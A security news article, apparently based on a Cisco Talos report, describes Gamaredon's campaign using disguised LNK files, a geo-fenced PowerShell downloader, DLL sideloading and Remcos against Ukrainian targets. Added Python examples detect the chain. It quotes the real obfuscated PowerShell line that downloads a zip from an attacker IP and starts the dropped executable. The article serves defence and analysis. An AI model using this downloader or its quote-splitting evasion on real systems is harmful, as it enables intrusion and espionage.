Gamaredon Hacker Group Using Weaponized LNK Files To Drop Remcos Backdoor on Windows

The post Gamaredon Hacker Group Using Weaponized LNK Files To Drop Remcos Backdoor on Windows appeared first on Cyber Security News.

Mar 29, 2025 - 11:55

A sophisticated cyber espionage campaign targeting Ukrainian entities has been uncovered, revealing the latest tactics of the Russia-linked Gamaredon threat actor group.

The attackers are leveraging weaponized LNK files disguised as Office documents to deliver the Remcos backdoor malware, utilizing themes related to troop movements in Ukraine as a social engineering lure to trick victims into executing the malicious files.

The attack begins when victims receive ZIP archives containing LNK shortcuts masquerading as important military documents with names like “Probable location of communication nodes, electronic warfare installations and enemy UAV calculations” and “Coordinates of enemy takeoffs for 8 days.”

When executed, these shortcuts silently run PowerShell code that initiates the infection chain while displaying a decoy document to maintain the illusion of legitimacy.

Cisco Talos researchers identified that this campaign has been active since at least November 2024, with evidence suggesting Gamaredon is specifically targeting Ukrainian government organizations, critical infrastructure, and entities affiliated with Ukraine’s defense and security apparatus.

The researchers noted the advanced evasion techniques employed throughout the attack chain.

The PowerShell downloader utilizes obfuscation methods to evade detection, communicating with geo-fenced servers located in Russia and Germany to retrieve the second-stage payload.

This geo-fencing restricts access to the malicious payloads to victims located within Ukraine, helping the campaign remain under the radar.

The threat actors employ a particularly effective technique whereby PowerShell executes commands indirectly through the Get-Command cmdlet to bypass string-based detection by security solutions:

if (-not(Test-Path tvdiag.''z''i''p -PathType Leaf)){&(g' cm) -uri ht''tp'':'/'/'146'.'1''85''.''233''.''96''/xallat/tvdiag.''zi''p -OutFile tvdiag.''zi''p}; Expand-Archive -Path tvdiag.''zi''p -DestinationPath Drvx64; star''t Drvx64/TiVoDiag.''e''xe;
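The quote-splitting shown above only defeats detections that match the raw command line. Because PowerShell concatenates adjacent string fragments in argument mode, a detector can collapse the quotes first and then match on the cmdlets that remain. The following is an added example written for this article, not code from Cisco Talos or from the campaign: it normalizes a constructed command line that imitates the style quoted above (the IP is a TEST-NET placeholder, and the aliases gcm/iwr are assumed for illustration), expands common aliases, and scores the result against a few behavioural indicators.

```python
import re

# Constructed sample command lines (not real telemetry). The first imitates the
# quote-splitting and &(gcm ...) indirection quoted in the article; the IP is a
# TEST-NET placeholder, not an indicator from the report. The second is benign.
SAMPLE_COMMAND_LINES = [
    "if (-not(Test-Path tvdiag.''z''i''p -PathType Leaf)){&(g''cm i''wr) -uri "
    "ht''tp'':'/'/'203.0.113.10/x/tvdiag.''zi''p -OutFile tvdiag.''zi''p}; "
    "Expand-Archive -Path tvdiag.''zi''p -DestinationPath Drvx64; "
    "star''t Drvx64/TiVoDiag.''e''xe;",
    "Get-ChildItem 'C:\\Temp' | Where-Object { $_.Length -gt 1MB }",
]

# Built-in aliases the obfuscated sample hides behind. They are expanded after
# quote removal so the rules below can match canonical cmdlet names.
ALIASES = {
    "gcm": "get-command",
    "iwr": "invoke-webrequest",
    "iex": "invoke-expression",
}

# Behavioural indicators matched against the normalized (lower-cased) text.
INDICATORS = {
    "indirect_invocation": re.compile(r"&\s*\(\s*get-command\b"),
    "download_to_disk": re.compile(r"\bhttps?://\S+.*-outfile\b"),
    "archive_extraction": re.compile(r"\bexpand-archive\b"),
    "start_dropped_exe": re.compile(r"\bstart\s+\S+\.exe\b"),
}


def quote_splits(cmd: str) -> int:
    """Count empty '' pairs: literal concatenation that serves no purpose but obfuscation."""
    return cmd.count("''")


def normalize(cmd: str) -> str:
    """Drop quote characters so fragments read as the words PowerShell will
    concatenate, collapse whitespace, lower-case, and expand known aliases."""
    text = cmd.replace("'", "").replace('"', "").lower()
    text = re.sub(r"\s+", " ", text)
    for alias, full in ALIASES.items():
        text = re.sub(rf"\b{alias}\b", full, text)
    return text


def classify(cmd: str) -> dict:
    """Return the indicators hit by a command line plus an overall verdict."""
    normalized = normalize(cmd)
    hits = [name for name, rx in INDICATORS.items() if rx.search(normalized)]
    splits = quote_splits(cmd)
    suspicious = (
        "indirect_invocation" in hits  # &(gcm ...) has almost no benign use
        or len(hits) >= 2              # download + extract/start chain
        or splits >= 5                 # heavy quote-splitting on its own
    )
    return {
        "normalized": normalized,
        "quote_splits": splits,
        "indicators": hits,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        verdict = classify(line)
        print(verdict["suspicious"], verdict["quote_splits"], verdict["indicators"])
```

The verdict combines three independent signals so that a single benign `Expand-Archive` does not page an analyst, while the `&(Get-Command ...)` indirection is treated as sufficient on its own. Feed it PowerShell Script Block Logging (Event ID 4104) or process command lines; the quote-splitting count is the cheapest signal and survives even if the actor rotates cmdlets.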

DLL Sideloading Technique

The second-stage payload employs DLL sideloading, a sophisticated technique where legitimate applications are abused to load malicious code.

In this case, clean applications like TiVoDiag.exe load malicious DLLs such as “mindclient.dll” during execution. The malicious DLL then decrypts and executes the final Remcos backdoor payload from encrypted files within the downloaded ZIP archive.

Figure: TiVoDiag.exe loading the malicious DLL (Source: Cisco Talos)

This technique takes advantage of the Windows DLL search order, allowing attackers to place their malicious DLL alongside a legitimate executable.

When the executable runs and attempts to load a required DLL, it loads the malicious version instead due to Windows’ predictable search paths.

Once executed, the Remcos payload injects itself into the Explorer.exe process and establishes communication with command and control servers, primarily hosted on GTHost and HyperHosting infrastructure.

The backdoor uses port 6856 for command and control operations, enabling the attackers to maintain persistent access to compromised systems for espionage purposes.
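The three post-download behaviours described above (a DLL sideloaded from the executable's own directory, injection into Explorer.exe, and Explorer.exe talking to a command and control server on port 6856) each leave a distinct trace in endpoint telemetry. The following is an added example, not code from the report or from any vendor: it runs simple rules over constructed events shaped like Sysmon image-load (ID 7), CreateRemoteThread (ID 8) and network-connection (ID 3) records. The file paths and the TEST-NET address are assumed for illustration; only the DLL name, executable name and port come from the article.

```python
import ntpath

# Directories whose contents are treated as trusted for the sideload and
# injection rules (assumption for this example; tune for the environment).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files")
REMCOS_C2_PORT = 6856  # port reported by Talos for this campaign

# Constructed sample events modelled on Sysmon fields (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 7, "Image": r"C:\Users\victim\Downloads\Drvx64\TiVoDiag.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\Drvx64\mindclient.dll", "Signed": "false"},
    {"event_id": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    {"event_id": 8, "SourceImage": r"C:\Users\victim\Downloads\Drvx64\TiVoDiag.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"event_id": 3, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 6856},
    {"event_id": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.20", "DestinationPort": 443},
]


def _trusted(path: str) -> bool:
    return path.lower().startswith(TRUSTED_PREFIXES)


def _is_explorer(path: str) -> bool:
    return ntpath.basename(path).lower() == "explorer.exe"


def rule_dll_sideload(ev: dict) -> bool:
    """Unsigned DLL loaded from the same non-trusted directory as its host EXE:
    the search-order abuse described in the article."""
    if ev.get("event_id") != 7:
        return False
    exe_dir = ntpath.dirname(ev["Image"]).lower()
    dll_dir = ntpath.dirname(ev["ImageLoaded"]).lower()
    return (exe_dir == dll_dir
            and not _trusted(ev["Image"])
            and ev.get("Signed", "false").lower() != "true")


def rule_explorer_injection(ev: dict) -> bool:
    """Remote thread created in Explorer.exe by a process outside trusted paths."""
    return (ev.get("event_id") == 8
            and _is_explorer(ev["TargetImage"])
            and not _trusted(ev["SourceImage"]))


def rule_explorer_c2_port(ev: dict) -> bool:
    """Explorer.exe opening an outbound connection on the reported Remcos port."""
    return (ev.get("event_id") == 3
            and _is_explorer(ev["Image"])
            and int(ev["DestinationPort"]) == REMCOS_C2_PORT)


RULES = {
    "dll_sideload": rule_dll_sideload,
    "explorer_injection": rule_explorer_injection,
    "explorer_c2_port": rule_explorer_c2_port,
}


def detect(events: list) -> list:
    """Return one alert dict per (event, rule) match, in event order."""
    alerts = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                alerts.append({"rule": name, "event_id": ev["event_id"],
                               "image": ev.get("Image") or ev.get("SourceImage")})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The sideload rule deliberately keys on location and signature rather than on `mindclient.dll`, since the DLL name is the easiest thing for the actor to change; the same rule also fires on other sideloading pairs dropped into user-writable directories. Correlating all three alerts on one host within a short window gives high confidence, but each is useful alone: the port 6856 rule in particular is cheap to deploy on firewall or flow logs.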

This campaign demonstrates Gamaredon’s continued focus on cyber espionage against Ukrainian targets, with the group adapting its tactics to include commercial malware alongside its custom tools.

Organizations in Ukraine and allied nations should implement recommended security measures and monitor for indicators of compromise associated with this campaign.
